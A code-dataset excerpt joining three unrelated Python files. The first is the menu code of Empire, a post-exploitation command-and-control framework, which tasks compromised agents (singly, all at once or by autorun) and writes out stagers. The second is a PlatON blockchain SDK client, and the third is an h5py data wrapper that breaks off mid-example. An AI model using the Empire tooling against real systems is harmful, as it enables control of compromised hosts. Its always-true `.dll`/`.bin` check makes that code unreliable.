self.module.options['Agent']['Value'] = agent
except Exception as e:
print(helpers.color("[!] ModuleMenu() init error: %s" % (e)))
def validate_options(self, prompt):
"Ensure all required module options are completed."
# ensure all 'Required=True' options are filled in
for option, values in self.module.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
print(helpers.color("[!] Error: Required module option missing."))
return False
# 'Agent' is set for all but external/* modules
if 'Agent' in self.module.options:
sessionID = self.module.options['Agent']['Value']
try:
# if we're running this module for all agents, skip this validation
if sessionID.lower() != "all" and sessionID.lower() != "autorun":
moduleLangVersion = float(self.module.info['MinLanguageVersion'])
agent_lang_version = float(self.mainMenu.agents.get_language_version_db(sessionID))
# check if the agent/module PowerShell versions are compatible
if moduleLangVersion > agent_lang_version:
print(helpers.color(
"[!] Error: module requires language version %s but agent running version %s" % (
moduleLangVersion, agent_lang_version)))
return False
except Exception as e:
print(helpers.color("[!] Invalid module or agent language version: %s" % (e)))
return False
# check if the module needs admin privs
if self.module.info['NeedsAdmin']:
# if we're running this module for all agents, skip this validation
if sessionID.lower() != "all" and sessionID.lower() != "autorun":
if not self.mainMenu.agents.is_agent_elevated(sessionID):
print(helpers.color("[!] Error: module needs to run in an elevated context."))
return False
# if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued)
if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
try:
choice = input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red"))
if not (choice.lower() != "" and choice.lower()[0] == "y"):
return False
except KeyboardInterrupt:
print("")
return False
return True
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_reload(self, line):
"Reload the current module."
print("\n" + helpers.color("[*] Reloading module") + "\n")
# reload the specific module
self.mainMenu.modules.reload_module(self.moduleName)
# regrab the reference
self.module = self.mainMenu.modules.modules[self.moduleName]
def do_info(self, line):
"Display module options."
messages.display_module(self.moduleName, self.module)
def do_options(self, line):
"Display module options."
messages.display_module(self.moduleName, self.module)
def do_set(self, line):
"Set a module option."
parts = line.split()
try:
option = parts[0]
if option not in self.module.options:
print(helpers.color("[!] Invalid option specified."))
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.module.options[option]['Description'].startswith("Switch."):
self.module.options[option]['Value'] = "True"
else:
print(helpers.color("[!] Please specify an option value."))
else:
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.module.options[option]['Value'] = value
except:
print(helpers.color("[!] Error in setting option, likely invalid option name."))
def do_unset(self, line):
"Unset a module option."
option = line.split()[0]
if line.lower() == "all":
for option in self.module.options:
self.module.options[option]['Value'] = ''
if option not in self.module.options:
print(helpers.color("[!] Invalid option specified."))
else:
self.module.options[option]['Value'] = ''
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = line.strip().rstrip("*")
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
_agent = ''
if 'Agent' in self.module.options:
_agent = self.module.options['Agent']['Value']
line = line.strip("*")
module_menu = ModuleMenu(self.mainMenu, line, agent=_agent)
module_menu.cmdloop()
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def do_execute(self, line):
"Execute the given Empire module."
prompt = True
if line == "noprompt":
prompt = False
if not self.validate_options(prompt):
return
if self.moduleName.lower().startswith('external/'):
# external/* modules don't include an agent specification, and only have
# an execute() method
self.module.execute()
else:
agentName = self.module.options['Agent']['Value']
moduleName = self.moduleName
moduleData = self.module.generate(self.mainMenu.obfuscate, self.mainMenu.obfuscateCommand)
if not moduleData or moduleData == "":
print(helpers.color("[!] Error: module produced an empty script"))
return
############################################
## No longer needed
# try:
# moduleData = moduleData.encode('UTF-8')
# print("im awesome")
# moduleData.decode('ascii')
# except UnicodeDecodeError:
# print(helpers.color("[!] Error: module source contains non-ascii characters"))
# return
############################################
# strip all comments from the module
moduleData = helpers.strip_powershell_comments(moduleData)
taskCommand = ""
# build the appropriate task command and module data blob
if str(self.module.info['Background']).lower() == "true":
# if this module should be run in the background
extention = self.module.info['OutputExtension']
if extention and extention != "":
# if this module needs to save its file output to the server
# format- [15 chars of prefix][5 chars extension][data]
saveFilePrefix = self.moduleName.split("/")[-1]
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
taskCommand = "TASK_CMD_JOB_SAVE"
else:
taskCommand = "TASK_CMD_JOB"
else:
# if this module is run in the foreground
extention = self.module.info['OutputExtension']
if self.module.info['OutputExtension'] and self.module.info['OutputExtension'] != "":
# if this module needs to save its file output to the server
# format- [15 chars of prefix][5 chars extension][data]
saveFilePrefix = self.moduleName.split("/")[-1][:15]
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
taskCommand = "TASK_CMD_WAIT_SAVE"
else:
taskCommand = "TASK_CMD_WAIT"
# if we're running the module on all agents
if agentName.lower() == "all":
try:
choice = input(helpers.color("[>] Run module on all agents? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
# signal everyone with what we're doing
message = "[*] Tasking all agents to run {}".format(self.moduleName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/all/{}".format(self.moduleName))
# actually task the agents
for agent in self.mainMenu.agents.get_agents_db():
sessionID = agent['session_id']
# set the agent's tasking in the cache
self.mainMenu.agents.add_agent_task_db(sessionID, taskCommand, moduleData)
# update the agent log
# dispatcher.send("[*] Tasked agent "+sessionID+" to run module " + self.moduleName, sender="Empire")
message = "[*] Tasked agent {} to run module {}".format(sessionID, self.moduleName)
signal = json.dumps({
'print': True,
'message': message,
'options': self.module.options
})
dispatcher.send(signal, sender="agents/{}/{}".format(sessionID, self.moduleName))
msg = "Tasked agent to run module {}".format(self.moduleName)
self.mainMenu.agents.save_agent_log(sessionID, msg)
except KeyboardInterrupt:
print("")
# set the script to be the global autorun
elif agentName.lower() == "autorun":
self.mainMenu.agents.set_autoruns_db(taskCommand, moduleData)
message = "[*] Set module {} to be global script autorun.".format(self.moduleName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents")
else:
if not self.mainMenu.agents.is_agent_present(agentName):
print(helpers.color("[!] Invalid agent name."))
else:
# set the agent's tasking in the cache
self.mainMenu.agents.add_agent_task_db(agentName, taskCommand, moduleData, moduleName=moduleName)
# update the agent log
message = "[*] Tasked agent {} to run module {}".format(agentName, self.moduleName)
signal = json.dumps({
'print': True,
'message': message,
'options': self.module.options
})
dispatcher.send(signal, sender="agents/{}/{}".format(agentName, self.moduleName))
msg = "Tasked agent to run module %s" % (self.moduleName)
self.mainMenu.agents.save_agent_log(agentName, msg)
def do_run(self, line):
"Execute the given Empire module."
self.do_execute(line)
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
if name != "" and self.mainMenu.agents.is_agent_present(name):
# resolve the passed name to a sessionID
sessionID = self.mainMenu.agents.get_agent_id_db(name)
agent_menu = AgentMenu(self.mainMenu, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a module option to set."
options = list(self.module.options.keys())
if line.split(' ')[1].lower() == "agent":
# if we're tab-completing "agent", return the agent names
agentNames = self.mainMenu.agents.get_agent_names_db() + ["all", "autorun"]
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in agentNames if s.startswith(mline)]
elif line.split(' ')[1].lower() == "listener":
# if we're tab-completing a listener name, return all the names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("path"):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith("file"):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith("host"):
return [helpers.lhost()]
elif line.split(' ')[1].lower().endswith("language"):
languages = ['powershell', 'python']
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a module option to unset."
options = list(self.module.options.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path."
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
class StagerMenu(SubMenu):
"""
The main class used by Empire to drive the 'stager' menu.
"""
def __init__(self, mainMenu, stagerName, listener=None):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Stager Menu'
# get the current stager name
self.stagerName = stagerName
self.stager = self.mainMenu.stagers.stagers[stagerName]
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("stager/" + self.stagerName, color="blue") + ') > '
# if this menu is being called from an listener menu
if listener:
# resolve the listener ID to a name, if applicable
listener = self.mainMenu.listeners.get_listener(listener)
self.stager.options['Listener']['Value'] = listener
def validate_options(self):
"Make sure all required stager options are completed."
for option, values in self.stager.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
print(helpers.color("[!] Error: Required stager option missing."))
return False
listenerName = self.stager.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print(helpers.color("[!] Invalid listener ID or name."))
return False
return True
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_info(self, line):
"Display stager options."
messages.display_stager(self.stager)
def do_options(self, line):
"Display stager options."
messages.display_stager(self.stager)
def do_set(self, line):
"Set a stager option."
parts = line.split()
try:
option = parts[0]
if option not in self.stager.options:
print(helpers.color("[!] Invalid option specified."))
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.stager.options[option]['Description'].startswith("Switch."):
self.stager.options[option]['Value'] = "True"
else:
print(helpers.color("[!] Please specify an option value."))
else:
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.stager.options[option]['Value'] = value
except:
print(helpers.color("[!] Error in setting option, likely invalid option name."))
def do_unset(self, line):
"Unset a stager option."
option = line.split()[0]
if line.lower() == "all":
for option in self.stager.options:
self.stager.options[option]['Value'] = ''
if option not in self.stager.options:
print(helpers.color("[!] Invalid option specified."))
else:
self.stager.options[option]['Value'] = ''
def do_generate(self, line):
"Generate/execute the given Empire stager."
if not self.validate_options():
return
stagerOutput = self.stager.generate()
savePath = ''
if 'OutFile' in self.stager.options:
savePath = self.stager.options['OutFile']['Value']
if savePath != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(savePath)) and os.path.dirname(savePath) != '':
os.makedirs(os.path.dirname(savePath))
# if we need to write binary output for a .dll
if ".dll" or ".bin" in savePath:
out_file = open(savePath, 'wb')
if isinstance(stagerOutput, str):
stagerOutput = stagerOutput.encode('UTF-8')
out_file.write(stagerOutput)
out_file.close()
else:
# otherwise normal output
out_file = open(savePath, 'w')
if isinstance(stagerOutput, bytes):
stagerOutput = stagerOutput.decode('latin-1')
out_file.write(stagerOutput)
out_file.close()
# if this is a bash script, make it executable
if ".sh" in savePath:
os.chmod(savePath, 0o777)
print("\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath)))
# dispatch this event
message = "[*] Generated stager"
signal = json.dumps({
'print': False,
'message': message,
'options': self.stager.options
})
dispatcher.send(signal, sender="empire")
else:
print(stagerOutput)
def do_execute(self, line):
"Generate/execute the given Empire stager."
self.do_generate(line)
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
if name != "" and self.mainMenu.agents.is_agent_present(name):
# resolve the passed name to a sessionID
sessionID = self.mainMenu.agents.get_agent_id_db(name)
agent_menu = AgentMenu(self.mainMenu, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a stager option to set."
options = list(self.stager.options.keys())
if line.split(' ')[1].lower() == "listener":
# if we're tab-completing a listener name, return all the names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("language"):
languages = ['powershell', 'python']
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("path"):
# tab-complete any stager option that ends with 'path'
return helpers.complete_path(text, line, arg=True)
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a stager option to unset."
options = list(self.stager.options.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
``` |
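The menus above repeat one tab-completion idiom: `mline` is everything typed after the command, `offs` strips the prefix readline already treats as matched, and only the remaining suffix of each candidate is returned. A minimal standalone sketch of that idiom (hypothetical listener names, no Empire imports):
```python
# Prefix-completion helper in the same shape as the complete_* methods above.
def complete_names(text, line, candidates):
    mline = line.partition(' ')[2]    # e.g. "kill http_li" -> "http_li"
    offs = len(mline) - len(text)     # part of mline readline already matched
    return [s[offs:] for s in candidates if s.startswith(mline)]

# Simulates cmd/readline invoking complete_kill(text='li', line='kill http_li', ...)
listeners = ['http_listener', 'http_hop', 'dns_listener']
print(complete_names('li', 'kill http_li', listeners))   # ['listener']
```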
{
"source": "jiuen1115/SM-client-sdk-python",
"score": 2
} |
#### File: SM-client-sdk-python/client_sdk_python/eth.py
```python
import json
import sha3
import rlp
import copy
from client_sdk_python.packages.eth_utils.hexadecimal import remove_0x_prefix
from client_sdk_python.packages.platon_account import (
Account,
)
from client_sdk_python.packages.platon_account.internal.transactions import bech32_address_bytes
from client_sdk_python.packages.eth_utils import (
apply_to_return_value,
is_checksum_address,
is_string,
)
from hexbytes import (
HexBytes,
)
from client_sdk_python.contract import (
Contract,
)
from client_sdk_python.wasmcontract import (
WasmContract,
)
from client_sdk_python.iban import (
Iban,
)
from client_sdk_python.module import (
Module,
)
from client_sdk_python.utils.blocks import (
select_method_for_block_identifier,
)
from client_sdk_python.utils.decorators import (
deprecated_for,
deprecated_in_v5,
)
from client_sdk_python.utils.empty import (
empty,
)
from client_sdk_python.utils.encoding import (
to_hex,
)
from client_sdk_python.utils.filters import (
BlockFilter,
LogFilter,
TransactionFilter,
)
from client_sdk_python.utils.toolz import (
assoc,
merge,
)
from client_sdk_python.utils.transactions import (
assert_valid_transaction_params,
extract_valid_transaction_params,
get_buffered_gas_estimate,
get_required_transaction,
replace_transaction,
wait_for_transaction_receipt,
)
from client_sdk_python.packages.platon_account.internal.signing import (
to_standard_signature_bytes,
)
true = True
false = False
class Eth(Module):
account = Account()
defaultAccount = empty
defaultBlock = "latest"
defaultContractFactory = Contract
iban = Iban
gasPriceStrategy = None
@deprecated_for("doing nothing at all")
def enable_unaudited_features(self):
pass
def namereg(self):
raise NotImplementedError()
def icapNamereg(self):
raise NotImplementedError()
@property
def protocolVersion(self):
return self.web3.manager.request_blocking("platon_protocolVersion", [])
@property
def syncing(self):
return self.web3.manager.request_blocking("platon_syncing", [])
# @property
# def coinbase(self):
# return self.web3.manager.request_blocking("platon_coinbase", [])
# @property
# def mining(self):
# return self.web3.manager.request_blocking("platon_mining", [])
# @property
# def hashrate(self):
# return self.web3.manager.request_blocking("platon_hashrate", [])
@property
def gasPrice(self):
return self.web3.manager.request_blocking("platon_gasPrice", [])
@property
def accounts(self):
return self.web3.manager.request_blocking("platon_accounts", [])
@property
def blockNumber(self):
return self.web3.manager.request_blocking("platon_blockNumber", [])
@property
def evidences(self):
data = self.web3.manager.request_blocking("platon_evidences", [])
return json.loads(data)
@property
def consensusStatus(self):
return self.web3.manager.request_blocking("platon_consensusStatus", [])
def getPrepareQC(self, block_number):
return self.web3.manager.request_blocking("platon_getPrepareQC", [block_number])
def getBalance(self, account, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getBalance",
[account, block_identifier],
)
def getStorageAt(self, account, position, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getStorageAt",
[account, position, block_identifier]
)
def getCode(self, account, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getCode",
[account, block_identifier],
)
def getBlock(self, block_identifier, full_transactions=False):
"""
`platon_getBlockByHash`
`platon_getBlockByNumber`
"""
method = select_method_for_block_identifier(
block_identifier,
if_predefined='platon_getBlockByNumber',
if_hash='platon_getBlockByHash',
if_number='platon_getBlockByNumber',
)
return self.web3.manager.request_blocking(
method,
[block_identifier, full_transactions],
)
def getBlockTransactionCount(self, block_identifier):
"""
`platon_getBlockTransactionCountByHash`
`platon_getBlockTransactionCountByNumber`
"""
method = select_method_for_block_identifier(
block_identifier,
if_predefined='platon_getBlockTransactionCountByNumber',
if_hash='platon_getBlockTransactionCountByHash',
if_number='platon_getBlockTransactionCountByNumber',
)
return self.web3.manager.request_blocking(
method,
[block_identifier],
)
# def getUncleCount(self, block_identifier):
# """
# `platon_getUncleCountByBlockHash`
# `platon_getUncleCountByBlockNumber`
# """
# method = select_method_for_block_identifier(
# block_identifier,
# if_predefined='platon_getUncleCountByBlockNumber',
# if_hash='platon_getUncleCountByBlockHash',
# if_number='platon_getUncleCountByBlockNumber',
# )
# return self.web3.manager.request_blocking(
# method,
# [block_identifier],
# )
# def getUncleByBlock(self, block_identifier, uncle_index):
# """
# `platon_getUncleByBlockHashAndIndex`
# `platon_getUncleByBlockNumberAndIndex`
# """
# method = select_method_for_block_identifier(
# block_identifier,
# if_predefined='platon_getUncleByBlockNumberAndIndex',
# if_hash='platon_getUncleByBlockHashAndIndex',
# if_number='platon_getUncleByBlockNumberAndIndex',
# )
# return self.web3.manager.request_blocking(
# method,
# [block_identifier, uncle_index],
# )
def getTransaction(self, transaction_hash):
return self.web3.manager.request_blocking(
"platon_getTransactionByHash",
[transaction_hash],
)
def getRawTransaction(self, transaction_hash):
return self.web3.manager.request_blocking(
"platon_getRawTransactionByHash",
[transaction_hash],
)
@deprecated_for("w3.eth.getTransactionByBlock")
def getTransactionFromBlock(self, block_identifier, transaction_index):
"""
Alias for the method getTransactionByBlock
Deprecated to maintain naming consistency with the json-rpc API
"""
return self.getTransactionByBlock(block_identifier, transaction_index)
def getTransactionByBlock(self, block_identifier, transaction_index):
"""
`platon_getTransactionByBlockHashAndIndex`
`platon_getTransactionByBlockNumberAndIndex`
"""
method = select_method_for_block_identifier(
block_identifier,
if_predefined='platon_getTransactionByBlockNumberAndIndex',
if_hash='platon_getTransactionByBlockHashAndIndex',
if_number='platon_getTransactionByBlockNumberAndIndex',
)
return self.web3.manager.request_blocking(
method,
[block_identifier, transaction_index],
)
def waitForTransactionReceipt(self, transaction_hash, timeout=120):
return wait_for_transaction_receipt(self.web3, transaction_hash, timeout)
def getTransactionReceipt(self, transaction_hash):
return self.web3.manager.request_blocking(
"platon_getTransactionReceipt",
[transaction_hash],
)
def getTransactionCount(self, account, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getTransactionCount",
[
account,
block_identifier,
],
)
def replaceTransaction(self, transaction_hash, new_transaction):
current_transaction = get_required_transaction(self.web3, transaction_hash)
return replace_transaction(self.web3, current_transaction, new_transaction)
def modifyTransaction(self, transaction_hash, **transaction_params):
assert_valid_transaction_params(transaction_params)
current_transaction = get_required_transaction(self.web3, transaction_hash)
current_transaction_params = extract_valid_transaction_params(current_transaction)
new_transaction = merge(current_transaction_params, transaction_params)
return replace_transaction(self.web3, current_transaction, new_transaction)
def sendTransaction(self, transaction):
# TODO: move to middleware
if 'from' not in transaction and is_checksum_address(self.defaultAccount):
transaction = assoc(transaction, 'from', self.defaultAccount)
# TODO: move gas estimation in middleware
if 'gas' not in transaction:
transaction = assoc(
transaction,
'gas',
get_buffered_gas_estimate(self.web3, transaction),
)
return self.web3.manager.request_blocking(
"platon_sendTransaction",
[transaction],
)
def sendRawTransaction(self, raw_transaction):
return self.web3.manager.request_blocking(
"platon_sendRawTransaction",
[raw_transaction],
)
def sign(self, account, data=None, hexstr=None, text=None):
message_hex = to_hex(data, hexstr=hexstr, text=text)
return self.web3.manager.request_blocking(
"platon_sign", [account, message_hex],
)
@apply_to_return_value(HexBytes)
def call(self, transaction, block_identifier=None):
# TODO: move to middleware
if 'from' not in transaction and is_checksum_address(self.defaultAccount):
transaction = assoc(transaction, 'from', self.defaultAccount)
# TODO: move to middleware
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_call",
[transaction, block_identifier],
)
def estimateGas(self, transaction):
# TODO: move to middleware
if 'from' not in transaction and is_checksum_address(self.defaultAccount):
transaction = assoc(transaction, 'from', self.defaultAccount)
return self.web3.manager.request_blocking(
"platon_estimateGas",
[transaction],
)
def filter(self, filter_params=None, filter_id=None):
if filter_id and filter_params:
raise TypeError(
"Ambiguous invocation: provide either a `filter_params` or a `filter_id` argument. "
"Both were supplied."
)
if is_string(filter_params):
if filter_params == "latest":
filter_id = self.web3.manager.request_blocking(
"platon_newBlockFilter", [],
)
return BlockFilter(self.web3, filter_id)
elif filter_params == "pending":
filter_id = self.web3.manager.request_blocking(
"platon_newPendingTransactionFilter", [],
)
return TransactionFilter(self.web3, filter_id)
else:
raise ValueError(
"The filter API only accepts the values of `pending` or "
"`latest` for string based filters"
)
elif isinstance(filter_params, dict):
_filter_id = self.web3.manager.request_blocking(
"platon_newFilter",
[filter_params],
)
return LogFilter(self.web3, _filter_id)
elif filter_id and not filter_params:
return LogFilter(self.web3, filter_id)
else:
raise TypeError("Must provide either filter_params as a string or "
"a valid filter object, or a filter_id as a string "
"or hex.")
def getFilterChanges(self, filter_id):
return self.web3.manager.request_blocking(
"platon_getFilterChanges", [filter_id],
)
def getFilterLogs(self, filter_id):
return self.web3.manager.request_blocking(
"platon_getFilterLogs", [filter_id],
)
def getLogs(self, filter_params):
return self.web3.manager.request_blocking(
"platon_getLogs", [filter_params],
)
def uninstallFilter(self, filter_id):
return self.web3.manager.request_blocking(
"platon_uninstallFilter", [filter_id],
)
def wasm_type(self,abi_data):
for i in range(len(abi_data)):
if abi_data[i]['type']=='Action':
abi_data[i]['type']='function'
if abi_data[i]['type']=='Event':
abi_data[i]['type'] = 'event'
abi_data[i]['anonymous'] = False
if len(abi_data[i]['input']) > 0:
for j in range(len(abi_data[i]['input'])):
abi_data[i]['input'][j]['indexed'] = ((j+1) <= abi_data[i]['topic'])
if abi_data[i]['type'] == 'struct':
if 'fields' in abi_data[i] and 'inputs' not in abi_data[i]:
abi_data[i]['inputs'] = abi_data[i].pop('fields')
if len(abi_data[i]['baseclass'])>0:
for j in range(len(abi_data[i]['baseclass'])):
abi_data[i]['inputs'].insert(j,{'name':abi_data[i]['baseclass'][j],'type':'struct'})
# else :
# abi_data[i]['inputs'].insert(0, {'name': abi_data[i]['baseclass'], 'type': 'struct'})
del abi_data[i]['baseclass']
if abi_data[i]['name']== 'init':
abi_data[i]['type']='constructor'
if 'input' in abi_data[i]:
abi_data[i]['inputs'] = abi_data[i].pop('input')
if 'output' in abi_data[i]:
abi_data[i]['outputs'] = {'name':"",'type':abi_data[i]['output']}
del abi_data[i]['output']
return abi_data
def contract(self,
address=None,
**kwargs):
ContractFactoryClass = kwargs.pop('ContractFactoryClass', self.defaultContractFactory)
ContractFactory = ContractFactoryClass.factory(self.web3, **kwargs)
if address:
return ContractFactory(address)
else:
return ContractFactory
def wasmcontract(self,
address=None,
**kwargs):
if 'vmtype' in kwargs:
if kwargs['vmtype'] == 1:
abi_data=copy.deepcopy(kwargs['abi'])
kwargs['abi']= self.wasm_type(abi_data)
# del kwargs['vmtype']
ContractFactoryClass = kwargs.pop('ContractFactoryClass', self.defaultContractFactory)
# if kwargs contains the 'ContractFactoryClass' key, use its value; otherwise fall back to self.defaultContractFactory
ContractFactory = ContractFactoryClass.factory(self.web3, **kwargs)
if address:
return ContractFactory(address)
else:
return ContractFactory
def setContractFactory(self, contractFactory):
self.defaultContractFactory = contractFactory
# @deprecated_in_v5
# def getCompilers(self):
# return self.web3.manager.request_blocking("platon_getCompilers", [])
# def getWork(self):
# return self.web3.manager.request_blocking("platon_getWork", [])
def generateGasPrice(self, transaction_params=None):
if self.gasPriceStrategy:
return self.gasPriceStrategy(self.web3, transaction_params)
def setGasPriceStrategy(self, gas_price_strategy):
self.gasPriceStrategy = gas_price_strategy
# add to platon
def analyzeReceiptByHash(self, tx_hash):
receipt = self.waitForTransactionReceipt(tx_hash)
return self.analyzeReceipt(receipt)
def analyzeReceipt(self, transaction_receipt):
return self.web3.analyzeReceipt(transaction_receipt)
def ecrecover(self, block_identifier):
block = self.getBlock(block_identifier)
extra = block.proofOfAuthorityData[0:32]
sign = block.proofOfAuthorityData[32:]
miner = bech32_address_bytes(remove_0x_prefix(block.miner))
raw_data = [bytes.fromhex(remove_0x_prefix(block.parentHash.hex())),
miner,
bytes.fromhex(remove_0x_prefix(block.stateRoot.hex())),
bytes.fromhex(remove_0x_prefix(block.transactionsRoot.hex())),
bytes.fromhex(remove_0x_prefix(block.receiptsRoot.hex())),
bytes.fromhex(remove_0x_prefix(block.logsBloom.hex())),
block.number,
block.gasLimit,
block.gasUsed,
block.timestamp,
extra,
bytes.fromhex(remove_0x_prefix(block.nonce))
]
message_hash = sha3.keccak_256(rlp.encode(raw_data)).digest()
hash_bytes = HexBytes(message_hash)
signature_bytes = HexBytes(sign)
signature_bytes_standard = to_standard_signature_bytes(signature_bytes)
signature_obj = self.account._keys.Signature(signature_bytes=signature_bytes_standard)
return remove_0x_prefix(signature_obj.recover_public_key_from_msg_hash(hash_bytes).to_hex())
class PlatON(Eth):
pass
``` |
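Before handing a WASM contract ABI to the factory, `wasmcontract()` runs it through `wasm_type()`, which rewrites `'Action'` entries as `'function'`, turns `init` into the constructor, and renames `input`/`output` to the EVM-style `inputs`/`outputs`. A small sketch of that transformation (the ABI content below is made up for illustration, `wasm_type()` is called unbound since it never touches `self`, and it assumes the `client_sdk_python` package is installed):
```python
from client_sdk_python.eth import Eth

# Hypothetical WASM-style ABI entries.
wasm_abi = [
    {'name': 'init', 'type': 'Action',
     'input': [{'name': 'owner', 'type': 'string'}]},
    {'name': 'transfer', 'type': 'Action',
     'input': [{'name': 'to', 'type': 'string'}, {'name': 'amount', 'type': 'uint64'}],
     'output': 'bool'},
]

converted = Eth.wasm_type(None, wasm_abi)
print(converted[0]['type'])      # 'constructor'
print(converted[1]['type'])      # 'function'
print(converted[1]['outputs'])   # {'name': '', 'type': 'bool'}
```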
{
"source": "jiuen1115/vitu",
"score": 2
} |
#### File: vitu/h5/file.py
```python
import threading
import h5py
import numpy as np
ochlv_type = np.dtype(
[('timestamp', 'uint64'), ('open', 'float_'), ('high', 'float_'), ('low', 'float_'), ('close', 'float_'),
('volume', 'float_')])
class File(h5py.File):
def __init__(self, name, mode=None, driver=None,
libver=None, userblock_size=None, swmr=False,
rdcc_nslots=None, rdcc_nbytes=None, rdcc_w0=None,
track_order=None,
**kwds):
h5py.File.__init__(self, name, mode=mode, swmr=swmr, libver='latest')
# def close(self):
# pass
def destroy(self):
super().close()
def create_dataset(self, name='ohlcv', shape=None, dtype=ochlv_type, data=None):
if not self.get('ohlcv'):
super().create_dataset(name, shape=shape, dtype=dtype, data=data)
def get_create_ohlcv(self, freq):
if not self.get('ohlcv'):
if freq == '1d':
self.create_dataset(shape=(366,))
if freq == '1m':
self.create_dataset(shape=(366 * 1440,))
if freq == '5m':
self.create_dataset(shape=(366 * 288,))
if freq in ['60min','1h']:
self.create_dataset(shape=(366 * 24,))
return self.get('ohlcv')
def get_ohlcv(self):
return self.get('ohlcv')
``` |
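A minimal usage sketch for the `File` wrapper above (file name and values are hypothetical; it assumes the module is importable as `vitu.h5.file`): open or create an HDF5 file, allocate the preallocated `ohlcv` dataset for a 1-hour frequency, write a single bar, and close the handle with `destroy()`.
```python
from vitu.h5.file import File

f = File('btc_usdt_1h.h5', mode='a')
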